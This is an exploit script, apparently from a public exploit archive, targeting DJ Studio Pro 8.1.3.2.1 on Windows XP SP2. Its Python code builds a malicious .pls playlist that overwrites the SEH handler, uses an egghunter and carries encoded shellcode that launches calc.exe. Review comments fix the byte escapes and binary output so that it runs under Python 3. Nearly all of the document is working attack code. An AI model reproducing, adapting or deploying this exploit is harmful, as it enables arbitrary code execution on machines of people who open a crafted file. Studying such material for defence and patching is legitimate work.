# Title : DJ Studio Pro Version 8.1.3.2.1 SEH Exploit
# Published : 2010-09-17
# Author : Abhishek Lyall
#DJ Studio Pro Version 8.1.3.2.1 SEH 0 day
#Author Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com
#Web - http://www.aslitsecurity.com/
#Blog - http://www.aslitsecurity.blogspot.com/
#Download Vulnerable application from http://www.e-soft.co.uk/DJSP.htm
#Vulnerable version DJ Studio Pro Version 8.1.3.2.1
#Tested on Windows XP SP2 only. The SEH handler address used below (POP POP RET in msvbvm60.dll) is specific to that system's copy of the module; re-locate a POP POP RET before using this against any other build.
#Greets Villy, Puneet Jain, Abhishek Sahni and ASL IT SECURITY TEAM
#!/usr/bin/python  (note: this shebang is not on line 1, so it has no effect here - run the script with `python <file>` explicitly)
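filename = "ASL.pls"

# windows/exec - CMD=calc.exe (encoded), prefixed with the egghunter tag twice
# ("ABHIABHI") so the egghunter below can find it.
# Every buffer in this file is a bytes literal: the original listing had lost the
# backslash of each "\x.." escape, so it wrote the ASCII text "x41x42..." instead
# of the bytes, and a str literal would additionally be UTF-8 encoded on
# Python 3, turning every byte >= 0x80 into two bytes and breaking the payload.
shellcode = (
    b"\x41\x42\x48\x49\x41\x42\x48\x49"  # Egg tag, doubled ("ABHIABHI")
    b"\xDB\xDF\xD9\x74\x24\xF4\x58\x2B\xC9\xB1\x33\xBA"
    b"\x4C\xA8\x75\x76\x83\xC0\x04\x31\x50\x13\x03\x1C\xBB\x97\x83\x60"
    b"\x53\xDE\x6C\x98\xA4\x81\xE5\x7D\x95\x93\x92\xF6\x84\x23\xD0\x5A"
    b"\x25\xCF\xB4\x4E\xBE\xBD\x10\x61\x77\x0B\x47\x4C\x88\xBD\x47\x02"
    b"\x4A\xDF\x3B\x58\x9F\x3F\x05\x93\xD2\x3E\x42\xC9\x1D\x12\x1B\x86"
    b"\x8C\x83\x28\xDA\x0C\xA5\xFE\x51\x2C\xDD\x7B\xA5\xD9\x57\x85\xF5"
    b"\x72\xE3\xCD\xED\xF9\xAB\xED\x0C\x2D\xA8\xD2\x47\x5A\x1B\xA0\x56"
    b"\x8A\x55\x49\x69\xF2\x3A\x74\x46\xFF\x43\xB0\x60\xE0\x31\xCA\x93"
    b"\x9D\x41\x09\xEE\x79\xC7\x8C\x48\x09\x7F\x75\x69\xDE\xE6\xFE\x65"
    b"\xAB\x6D\x58\x69\x2A\xA1\xD2\x95\xA7\x44\x35\x1C\xF3\x62\x91\x45"
    b"\xA7\x0B\x80\x23\x06\x33\xD2\x8B\xF7\x91\x98\x39\xE3\xA0\xC2\x57"
    b"\xF2\x21\x79\x1E\xF4\x39\x82\x30\x9D\x08\x09\xDF\xDA\x94\xD8\xA4"
    b"\x05\x77\xC9\xD0\xAD\x2E\x98\x59\xB0\xD0\x76\x9D\xCD\x52\x73\x5D"
    b"\x2A\x4A\xF6\x58\x76\xCC\xEA\x10\xE7\xB9\x0C\x87\x08\xE8\x6E\x46"
    b"\x9B\x70\x5F\xED\x1B\x12\x9F"
)

# 32-byte egghunter carrying the 4-byte tag "ABHI"; it looks for the doubled tag
# and passes control to whatever follows it (the shellcode above).
egghunter = (
    b"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
    b"\x41\x42\x48\x49"  # Egghunter tag "ABHIABHI" Greets http://www.corelan.be:8800
    b"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
)

# .pls header, i.e. "[playlist]\r\nFile1=" - everything after it is the File1 value.
head = b"\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0D\x0A\x46\x69\x6C\x65\x31\x3D"
junk = b"\x41" * 1940          # filler up to the SEH record
nseh = b"\xeb\x06\x90\x90"      # nSEH: short jump (+6) over the handler address into the NOPs
seh = b"\xcb\x75\x52\x73"       # SEH: POP POP RET 0x735275CB msvbvm60.dll (XP SP2 specific; re-find elsewhere)
nop = b"\x90" * 12              # NOP sled the short jump lands in, leading into the egghunter

# NOTE(review): this subtraction does not include `egghunter` (32 bytes), so the
# data after `head` is 5032 bytes rather than 5000. Left unchanged to preserve the
# layout the author reports as tested; the egghunter presumably finds the
# shellcode by its tag, so the shellcode's absolute offset should not matter.
padd = b"\x90" * (5000 - len(junk + nseh + seh + nop + shellcode))

payload = head + junk + nseh + seh + nop + egghunter + padd + shellcode

# Binary mode is required: text mode would rewrite the \x0A in the header as
# \x0D\x0A on Windows and would encode the bytes on Python 3, corrupting the file.
with open(filename, "wb") as outfile:
    outfile.write(payload)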